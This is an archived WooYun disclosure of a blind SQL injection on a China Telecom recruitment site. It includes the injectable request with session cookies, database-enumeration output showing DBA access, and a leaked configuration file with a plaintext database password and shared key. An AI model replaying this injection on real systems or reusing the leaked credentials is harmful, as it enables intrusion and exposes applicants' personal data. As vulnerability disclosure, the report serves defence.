当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142490

漏洞标题:中国电信某站SQL注入漏洞(时间盲注/DBA权限/大量信息泄露)

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2015-09-24 23:03

修复时间:2015-11-13 10:08

公开时间:2015-11-13 10:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开

简要描述:

RT

详细说明:

URL:http://**.**.**.**
测试:

GET /shixibao/cp.php?residecity=&name=aaa&username=&searchsubmit=%B2%E9%D5%D2&ac=friend&op=search&type=base HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE
Referer: http://**.**.**.**/shixibao/cp.php?ac=friend&op=search&view=reside
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=9pn1vm0akovauie5a335c5tvb2; lvid=b19139a2392c542f441d7e58c619e264; nvid=1; s_pers=%20s_fid%3D45636F5C10EB727B-2D660E17E30AF73F%7C1505822950638%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Deshipeship-189-all%253D%252526pid%25253D%2525252Freg2%252526pidt%25253D1%252526oid%25253Djavascript%2525253A%2525253B%252526ot%25253DA%3B; DQMHStanduserId=20150000000032913522; userId=1%7C20150000000032913522; dqmhIpCityInfos=%E5%8C%97%E4%BA%AC%E5%B8%82+%E8%81%94%E9%80%9A; loginStatus=logined; __qc_wId=356; pgv_pvid=5871468180; trkHmPageName=%2Fbj%2F; trkHmCoords=0; trkHmCity=0; trkHmLinks=0; cityCode=bj; SHOPID_COOKIEID=10001; s_cc=true; s_fid=48FC7A85226ECCFE-18831160BEDE3A5D; s_sq=eshipeship-189-all%3D%2526pid%253D%25252Fdqmh%25252FuserCenter%25252FmyOrderInfoList.do%25253Fmethod%25253DmangeAddr%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252F**.**.**.**%25252Fdqmh%25252FssoLink.do%25253Fmethod%25253Dskip%252526platNo%25253D93505%252526toStUrl%25253Dhttp%25253A%25252F%25252F**.**.**.**%2526ot%253DA; trkHmClickCoords=1284%2C8; LSID=aSEUDBw0HFa8WvQGL-; uchome_view_blogid=205; jiathis_rdc=%7B%22http%3A//**.**.**.**/shixibao/space.php%3Fuid%3D52131%26do%3Dblog%26id%3D206%22%3A0%7C1442665279182%2C%22http%3A//**.**.**.**/shixibao/space.php%3Fuid%3D52114%26do%3Dblog%26id%3D205%22%3A%220%7C1442665846816%22%7D; jnfbygbookbid=1; jnfbyloginnum=2; jnfbylastlogintime=1442666836; uchome_seccode=744dI4LaOKteAVAbz6x7ThTGunfUfl3SGWhujNXCP8LL; uchome_auth=b589k0qHxDIqjn39rocSgwJnruaOoGoBmKJdjDWIfJuO40SCQCR3ymxPdtHYKPyw5w3i5lvXx0EgEWG30JINuKiCIQ; uchome_loginuser=testwooyun; uchome_jnfbymluserid=52131; uchome_synfriend=1; uchome_reurl=%252Fshixibao%252Fcp.php%253Fac%253Dzhiwei_result_detail%2526ignore%253D1%2526jobid%253D6656; uchome_checkpm=1; uchome_sendmail=1; CNZZDATA1252975852=2119416073-1442662706-null%7C1442662706

漏洞证明:

32.jpg


权限和用户:

current user is DBA:    True
current user:    'admin@%'


数据库(16个):

available databases [16]:
[*] cdcol
[*] cem_db
[*] game
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] shixibao
[*] shixibao_uc
[*] shixibao_uchome
[*] shixibao_uchome_20140525
[*] test
[*] testmql
[*] ultrax
[*] webauth
[*] zhiweibeifen


shixibao_uchome:

[182 tables]
+----------------------------+
| dajie                      |
| jobcollect                 |
| mm_attach_files            |
| mm_audition_task           |
| mm_audition_user           |
| mm_city                    |
| mm_company_interest        |
| mm_company_visitor         |
| mm_compus_news             |
| mm_compus_posdeli_view     |
| mm_delivercont_view        |
| mm_delivery                |
| mm_delivery_attach         |
| mm_department              |
| mm_dept_location           |
| mm_deptinfo                |
| mm_dynamic                 |
| mm_employinfo              |
| mm_employinfo_view         |
| mm_enterprise_zhaopin      |
| mm_follow                  |
| mm_grade_template          |
| mm_grades_enter            |
| mm_grades_user             |
| mm_hgz_user                |
| mm_home_card               |
| mm_interview_notice        |
| mm_jianzhi_delivery        |
| mm_like                    |
| mm_lucky_log               |
| mm_lucky_wall              |
| mm_mail_template           |
| mm_mailqueue               |
| mm_member_view             |
| mm_parttime_job            |
| mm_personal_zhaopin        |
| mm_post_attachment         |
| mm_post_recommend          |
| mm_postclass               |
| mm_postclass_detail        |
| mm_praise                  |
| mm_provinces               |
| mm_questions               |
| mm_questions_view          |
| mm_replayments             |
| mm_replayments_view        |
| mm_report                  |
| mm_score                   |
| mm_score_eachsum           |
| mm_score_item              |
| mm_score_mark              |
| mm_score_marker            |
| mm_score_stat              |
| mm_score_task              |
| mm_score_template          |
| mm_strategies              |
| mm_students_star           |
| mm_subscribe_job           |
| mm_talent_pool             |
| mm_task                    |
| mm_task_attach             |
| mm_task_mapping            |
| mm_taskcompany_map         |
| mm_taskuser_map            |
| mm_themes                  |
| mm_univs                   |
| mm_user_upload             |
| mm_userbaseinfo            |
| mm_usercode_map            |
| mm_usereduinfo             |
| mm_userinfo                |
| mm_userinfo_zhiweiinfo_all |
| mm_userreg_channel         |
| mm_userresumeinfo          |
| mm_userskill_map           |
| mm_useruniversmap          |
| mm_userunivsmap_view       |
| mm_video_course            |
| mm_video_score             |
| mm_video_wall              |
| mm_whos_online             |
| mm_work                    |
| mm_work_comment            |
| mm_young_report            |
| mm_young_report_map        |
| mm_young_tribe             |
| mm_younger_gd_temp         |
| mm_youngmembers            |
| mm_zhiwei_questions        |
| mm_zhiwei_replayments      |
| mm_zhiwei_send             |
| mm_zhiwei_temp             |
| mm_zhiweiapply_view        |
| mm_zhiweiapply_view_1      |
| mm_zhiweiinfo              |
| mm_ztask_classify          |
| uchome_activity_notice     |
| uchome_ad                  |
| uchome_adminsession        |
| uchome_album               |
| uchome_appcreditlog        |
| uchome_blacklist           |
| uchome_block               |
| uchome_blog                |
| uchome_blogfield           |
| uchome_cache               |
| uchome_class               |
| uchome_click               |
| uchome_clickuser           |
| uchome_comment             |
| uchome_config              |
| uchome_coupon              |
| uchome_creditlog           |
| uchome_creditrule          |
| uchome_cron                |
| uchome_data                |
| uchome_docomment           |
| uchome_doing               |
| uchome_event               |
| uchome_eventclass          |
| uchome_eventfield          |
| uchome_eventinvite         |
| uchome_eventpic            |
| uchome_feed                |
| uchome_friend              |
| uchome_friendguide         |
| uchome_friendlog           |
| uchome_home_card           |
| uchome_invite              |
| uchome_job                 |
| uchome_log                 |
| uchome_magic               |
| uchome_magicinlog          |
| uchome_magicstore          |
| uchome_magicuselog         |
| uchome_mailcron            |
| uchome_mailqueue           |
| uchome_member              |
| uchome_member_extend       |
| uchome_member_third        |
| uchome_mtag                |
| uchome_mtaginvite          |
| uchome_myapp               |
| uchome_myinvite            |
| uchome_notification        |
| uchome_pic                 |
| uchome_picfield            |
| uchome_poke                |
| uchome_poll                |
| uchome_pollfield           |
| uchome_polloption          |
| uchome_polluser            |
| uchome_post                |
| uchome_profield            |
| uchome_profilefield        |
| uchome_report              |
| uchome_resume              |
| uchome_session             |
| uchome_share               |
| uchome_show                |
| uchome_space               |
| uchome_spacefield          |
| uchome_spaceinfo           |
| uchome_spacelog            |
| uchome_stat                |
| uchome_statuser            |
| uchome_tag                 |
| uchome_tagblog             |
| uchome_tagspace            |
| uchome_task                |
| uchome_thread              |
| uchome_topic               |
| uchome_topicuser           |
| uchome_userapp             |
| uchome_userappfield        |
| uchome_userevent           |
| uchome_usergroup           |
| uchome_userlog             |
| uchome_usermagic           |
| uchome_usertask            |
| uchome_visitor             |
| uchome_zan                 |
+----------------------------+


shixibao_uchome -> mm_userinfo 35895条用户资料信息
还有一些侧漏的东西:
1.http://**.**.**.**/shixibao/config.php.bak

应用管理->查看本应用->复制里面对应的配置信息进行替换) define('UC_CONNECT', 'mysql'); // 连接 UCenter 的方式: mysql/NULL, 默认为空时为 fscoketopen(), mysql 是直接连接的数据库, 为了效率, 建议采用 mysql define('UC_DBHOST', '**.**.**.**'); // UCenter 数据库主机 define('UC_DBUSER', 'admin'); // UCenter 数据库用户名 define('UC_DBPW', 'ctbri4008118114'); // UCenter 数据库密码 define('UC_DBNAME', 'shixibao_uc'); // UCenter 数据库名称 define('UC_DBCHARSET', 'gbk'); // UCenter 数据库字符集 define('UC_DBTABLEPRE', '`shixibao_uc`.uc_'); // UCenter 数据库表前缀 define('UC_DBCONNECT', '0'); // UCenter 数据库持久连接 0=关闭, 1=打开 define('UC_KEY', 'abc123'); // 与 UCenter 的通信密钥, 要与 UCenter 保持一致 define('UC_API', 'http://**.**.**.**/shixibao/ucenter'); // UCenter 的 URL 地址, 在调用头像时依赖此常量 define('UC_CHARSET', 'gbk'); // UCenter 的字符集 define('UC_IP', '**.**.**.**'); // UCenter 的 IP, 当 UC_CONNECT 为非 mysql 方式时, 并且当前应用服务器解析域名有问题时, 请设置此值 define('UC_APPID', '4'); // 当前应用的 ID define('UC_PPP', 20);

2.备份:
http://**.**.**.**/shixibao/data.rar

修复方案:

保护应聘者的信息

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-29 10:06

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置

最新状态:

暂无